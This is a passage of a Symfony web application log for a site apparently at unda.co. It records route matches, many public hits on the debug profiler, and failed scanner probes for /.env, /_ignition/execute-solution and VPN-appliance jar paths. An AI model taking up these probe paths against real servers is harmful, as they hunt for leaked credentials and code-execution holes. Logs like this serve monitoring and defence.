  3954. [2025-12-18 13:49:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4ceed5","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/4ceed5?panel=time","method":"GET"} []
  3955. [2025-12-18 13:49:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  3956. [2025-12-18 13:55:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3957. [2025-12-18 13:55:06] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  3958. [2025-12-18 13:58:43] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7300e2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7300e2?panel=config","method":"GET"} []
  3959. [2025-12-18 13:58:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  3960. [2025-12-18 14:04:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"74da02","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/74da02?panel=db","method":"GET"} []
  3961. [2025-12-18 14:04:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  3962. [2025-12-18 14:04:35] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"628fdc","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/628fdc?panel=swiftmailer","method":"GET"} []
  3963. [2025-12-18 14:04:35] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
  3964. [2025-12-18 14:07:36] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4ceed5","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/4ceed5?panel=twig","method":"GET"} []
  3965. [2025-12-18 14:07:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  3966. [2025-12-18 14:12:23] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  3967. [2025-12-18 14:12:27] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  3968. [2025-12-18 14:15:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4ceed5","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/4ceed5","method":"GET"} []
  3969. [2025-12-18 14:15:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  3970. [2025-12-18 14:16:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/Java.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/Java.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3971. [2025-12-18 14:16:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/a1.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/a1.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3972. [2025-12-18 14:17:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"6eb557","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/6eb557?panel=cache","method":"GET"} []
  3973. [2025-12-18 14:17:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  3974. [2025-12-18 14:23:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4ceed5","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/4ceed5?panel=cache","method":"GET"} []
  3975. [2025-12-18 14:23:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  3976. [2025-12-18 14:30:30] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  3977. [2025-12-18 14:32:30] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7300e2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7300e2?panel=cache","method":"GET"} []
  3978. [2025-12-18 14:32:30] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  3979. [2025-12-18 14:38:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?panel=logger","method":"GET"} []
  3980. [2025-12-18 14:38:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  3981. [2025-12-18 14:40:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4ceed5","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/4ceed5?panel=config","method":"GET"} []
  3982. [2025-12-18 14:40:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  3983. [2025-12-18 14:47:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"af2b6f","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/af2b6f?panel=router","method":"GET"} []
  3984. [2025-12-18 14:47:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  3985. [2025-12-18 14:48:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e05b43","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e05b43?panel=twig","method":"GET"} []
  3986. [2025-12-18 14:48:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  3987. [2025-12-18 14:51:40] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  3988. [2025-12-18 14:51:42] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  3989. [2025-12-18 14:51:53] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"647a97","_route":"_wdt"},"request_uri":"https://web.unda.co/_wdt/647a97","method":"GET"} []
  3990. [2025-12-18 14:52:24] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  3991. [2025-12-18 14:54:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4daf2f","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/4daf2f?panel=time","method":"GET"} []
  3992. [2025-12-18 14:54:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  3993. [2025-12-18 14:56:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e05b43","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e05b43?panel=time","method":"GET"} []
  3994. [2025-12-18 14:56:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  3995. [2025-12-18 15:05:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e05b43","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e05b43?panel=security","method":"GET"} []
  3996. [2025-12-18 15:05:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  3997. [2025-12-18 15:13:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e05b43","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e05b43?panel=request","method":"GET"} []
  3998. [2025-12-18 15:13:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  3999. [2025-12-18 15:15:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4000. [2025-12-18 15:21:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"016869","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/016869?panel=security","method":"GET"} []
  4001. [2025-12-18 15:21:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  4002. [2025-12-18 15:21:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fbdc7b","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/fbdc7b?panel=form","method":"GET"} []
  4003. [2025-12-18 15:21:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  4004. [2025-12-18 15:23:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0f40a7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0f40a7?panel=db","method":"GET"} []
  4005. [2025-12-18 15:23:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  4006. [2025-12-18 15:25:39] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  4007. [2025-12-18 15:25:48] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"HEAD"} []
  4008. [2025-12-18 15:25:48] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
  4009. [2025-12-18 15:25:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4010. [2025-12-18 15:25:50] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
  4011. [2025-12-18 15:25:51] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"POST"} []
  4012. [2025-12-18 15:25:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_ignition/execute-solution"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_ignition/execute-solution\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4013. [2025-12-18 15:25:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /public/_ignition/execute-solution"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /public/_ignition/execute-solution\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4014. [2025-12-18 15:31:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4015. [2025-12-18 15:35:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e05b43","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e05b43?panel=config","method":"GET"} []
  4016. [2025-12-18 15:35:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  4017. [2025-12-18 15:41:24] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"daff8d","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/daff8d?panel=router","method":"GET"} []
  4018. [2025-12-18 15:41:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  4019. [2025-12-18 15:42:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"04e5af","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/04e5af","method":"GET"} []
  4020. [2025-12-18 15:42:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  4021. [2025-12-18 15:43:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e05b43","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e05b43?panel=cache","method":"GET"} []
  4022. [2025-12-18 15:43:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  4023. [2025-12-18 15:51:02] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"HEAD"} []
  4024. [2025-12-18 15:51:02] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  4025. [2025-12-18 15:51:02] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4026. [2025-12-18 15:51:02] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4027. [2025-12-18 15:51:02] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  4028. [2025-12-18 15:51:02] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  4029. [2025-12-18 15:51:02] security.DEBUG: Calling Authentication entry point. [] []
  4030. [2025-12-18 15:51:03] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  4031. [2025-12-18 15:51:03] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  4032. [2025-12-18 15:51:03] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4033. [2025-12-18 15:51:03] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4034. [2025-12-18 15:51:03] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  4035. [2025-12-18 15:51:03] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  4036. [2025-12-18 15:51:03] security.DEBUG: Calling Authentication entry point. [] []
  4037. [2025-12-18 15:51:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4038. [2025-12-18 15:51:04] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  4039. [2025-12-18 15:51:04] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  4040. [2025-12-18 15:51:04] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4041. [2025-12-18 15:51:04] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4042. [2025-12-18 15:51:04] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  4043. [2025-12-18 15:51:04] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  4044. [2025-12-18 15:51:04] security.DEBUG: Calling Authentication entry point. [] []
  4045. [2025-12-18 15:51:05] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"POST"} []
  4046. [2025-12-18 15:51:05] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  4047. [2025-12-18 15:51:05] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4048. [2025-12-18 15:51:05] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4049. [2025-12-18 15:51:05] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  4050. [2025-12-18 15:51:05] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  4051. [2025-12-18 15:51:05] security.DEBUG: Calling Authentication entry point. [] []
  4052. [2025-12-18 15:51:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_ignition/execute-solution"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_ignition/execute-solution\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4053. [2025-12-18 15:51:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /public/_ignition/execute-solution"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /public/_ignition/execute-solution\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4054. [2025-12-18 15:52:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e05b43","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e05b43","method":"GET"} []
  4055. [2025-12-18 15:52:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  4056. [2025-12-18 16:01:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3e8aaa","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/3e8aaa?panel=twig","method":"GET"} []
  4057. [2025-12-18 16:01:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
